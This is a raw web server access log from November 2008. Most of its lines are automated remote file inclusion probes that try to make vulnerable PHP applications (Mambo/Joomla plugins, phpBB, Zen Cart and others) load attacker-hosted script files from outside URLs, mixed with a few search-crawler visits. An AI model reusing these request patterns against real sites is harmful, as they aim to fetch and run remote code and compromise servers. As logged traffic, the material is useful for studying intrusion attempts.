66.40.52.28 - - [04/Nov/2008:10:40:52 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:40:59 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:40:59 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:40:59 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:41:02 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:41:27 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:41:27 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:41:28 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:41:30 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.36.51.69 - - [04/Nov/2008:10:41:41 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.36.51.69 - - [04/Nov/2008:10:41:41 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.36.51.69 - - [04/Nov/2008:10:41:41 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.36.51.69 - - [04/Nov/2008:10:41:42 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:42:52 -0800] "GET /bikes/dteel/2008_02_08/?N=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:10:42:59 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:42:59 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:42:59 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:43:01 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:43:05 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
65.55.211.36 - - [04/Nov/2008:10:43:06 -0800] "GET /?N=D&show=gallery&pageid=159 HTTP/1.1" 200 166154 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:10:43:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:10:43:08 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.216.203.76 - - [04/Nov/2008:10:43:08 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.203.76 - - [04/Nov/2008:10:43:08 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:43:19 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.37 - - [04/Nov/2008:10:43:19 -0800] "GET /bikes/dteel/2008_02_16/?M=A HTTP/1.1" 200 1696 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:43:19 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:43:48 -0800] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:43:49 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:43:50 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:43:54 -0800] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:43:54 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:43:55 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:43:56 -0800] "GET /logs//poll/png.php?include_path=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:44:06 -0800] "GET /logs/access_080227.log//poll/png.php?include_path=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:44:08 -0800] "GET /logs/access_080915.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.207.39 - - [04/Nov/2008:10:44:12 -0800] "GET /logs/access_080915.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:44:13 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:44:14 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:44:14 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:44:17 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.214.37.182 - - [04/Nov/2008:10:45:23 -0800] "GET /?include_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 200 94697 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.214.37.182 - - [04/Nov/2008:10:45:24 -0800] "GET /logs//?include_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 200 72168 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:10:46:24 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/motors_monthlypayment_new_e5573us.js HTTP/1.1" 200 2475 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
78.32.121.89 - - [04/Nov/2008:10:46:43 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://treasurechestdesigns.com/store/pub/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.32.121.89 - - [04/Nov/2008:10:46:43 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://treasurechestdesigns.com/store/pub/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.32.121.89 - - [04/Nov/2008:10:46:44 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://treasurechestdesigns.com/store/pub/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.32.121.89 - - [04/Nov/2008:10:46:50 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://treasurechestdesigns.com/store/pub/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:46:50 -0800] "GET /logs//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:46:50 -0800] "GET /include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:10:47:33 -0800] "GET /logs/access_080329.log/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:10:47:33 -0800] "GET /errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:10:47:33 -0800] "GET /logs/access_080408.log/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:10:47:33 -0800] "GET /logs/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:47:35 -0800] "GET /logs/trans.php?trans=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:47:36 -0800] "GET /trans.php?trans=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:48:03 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:48:03 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:48:04 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 95275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:48:28 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:10:49:56 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:10:49:56 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:22 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:22 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.251.177.84 - - [04/Nov/2008:10:50:23 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.251.177.84 - - [04/Nov/2008:10:50:23 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:23 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 95319 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:26 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:32 -0800] "GET /logs/access_080329.log/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:32 -0800] "GET /logs/access_080408.log/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:32 -0800] "GET /logs/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:33 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:33 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:33 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:33 -0800] "GET /errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:10:50:34 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 95303 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:40 -0800] "GET /logs/access_080329.log/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:40 -0800] "GET /logs/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:40 -0800] "GET /errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:50:41 -0800] "GET /logs/access_080408.log/errors.php?error=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
81.21.75.36 - - [04/Nov/2008:10:52:09 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.21.75.36 - - [04/Nov/2008:10:52:09 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.21.75.36 - - [04/Nov/2008:10:52:09 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.21.75.36 - - [04/Nov/2008:10:52:10 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt%0D? HTTP/1.1" 200 95572 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:52:11 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:52:12 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 95275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:52:13 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
81.21.75.36 - - [04/Nov/2008:10:52:41 -0800] "GET /logs/access_080223.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.21.75.36 - - [04/Nov/2008:10:52:41 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:10:52:42 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
91.121.95.109 - - [04/Nov/2008:10:52:43 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [04/Nov/2008:10:52:43 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 200 95296 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:10:52:54 -0800] "GET /logs/access_080923.log//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:10:52:55 -0800] "GET /adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:10:52:55 -0800] "GET /logs//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [04/Nov/2008:10:52:55 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [04/Nov/2008:10:52:55 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:53:17 -0800] "GET /logs/access_080306.log HTTP/1.0" 200 1441792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.39 - - [04/Nov/2008:10:53:54 -0800] "GET /logs/access_080825.log HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
218.239.45.184 - - [04/Nov/2008:10:54:29 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geeklinuxer.co.cc/data/Gang11/id? HTTP/1.1" 200 95345 "-" "libwww-perl/5.79" "www.dmulk.com"
